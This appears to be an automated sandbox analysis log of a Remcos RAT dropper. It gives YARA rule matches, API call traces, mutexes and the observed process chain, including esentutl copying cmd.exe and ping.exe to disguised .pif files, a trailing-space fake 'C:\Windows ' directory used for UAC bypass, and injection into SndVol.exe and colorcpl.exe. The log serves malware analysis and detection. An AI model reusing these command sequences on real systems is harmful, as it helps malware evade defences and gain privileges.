              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFCode function: String function: 02E246D4 appears 155 times
              Source: jW3NEKvxH1.exeBinary or memory string: OriginalFilename vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000003.2145769596.000000007FC9F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2290920143.000000007EE5E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A86000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2280895111.0000000020A6E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000003.2228181025.000000007F040000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000003.2227877290.000000007EA50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002856000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2293566287.000000007FAB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2266110150.00000000023B5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000003.2145952303.0000000002852000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000002.2266672340.0000000002850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000003.2249226014.0000000021B53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exe, 00000000.00000003.2146235666.000000007F96F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs jW3NEKvxH1.exe
              Source: jW3NEKvxH1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 19.2.SndVol.exe.2940000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.colorcpl.exe.2460000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.colorcpl.exe.2460000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.SndVol.exe.2920000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.SndVol.exe.2920000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 19.2.SndVol.exe.2940000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.jW3NEKvxH1.exe.2d30000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000018.00000002.2475144100.0000000002460000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000013.00000002.2410456379.0000000002940000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000002.2288933657.000000007E7A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: jW3NEKvxH1.exe PID: 616, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: SndVol.exe PID: 4576, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: SndVol.exe PID: 3648, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: colorcpl.exe PID: 2680, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@34/10@4/4
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02936AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6_2_02936AB7
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 19_2_02956AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,19_2_02956AB7
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D37FD2 GetDiskFreeSpaceA,0_2_02D37FD2
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0292E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,6_2_0292E219
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeCode function: 0_2_02D46DC8 CoCreateInstance,0_2_02D46DC8
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_0293A63F FindResourceA,LoadResource,LockResource,SizeofResource,6_2_0293A63F
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 6_2_02939BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_02939BC4
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_03
              Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-RX8VCL
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: jW3NEKvxH1.exeReversingLabs: Detection: 55%
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeFile read: C:\Users\user\Desktop\jW3NEKvxH1.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\jW3NEKvxH1.exe "C:\Users\user\Desktop\jW3NEKvxH1.exe"
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /o
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
              Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
              Source: unknownProcess created: C:\Users\Public\Libraries\Dlaybpxl.PIF "C:\Users\Public\Libraries\Dlaybpxl.PIF"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
              Source: unknownProcess created: C:\Users\Public\Libraries\Dlaybpxl.PIF "C:\Users\Public\Libraries\Dlaybpxl.PIF"
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxpbyalD.cmd" "Jump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\jW3NEKvxH1.exe /d C:\\Users\\Public\\Libraries\\Dlaybpxl.PIF /oJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
              Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
              Source: C:\Users\Public\Libraries\Dlaybpxl.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\jW3NEKvxH1.exeSection loaded: uxtheme.dllJump to behavior
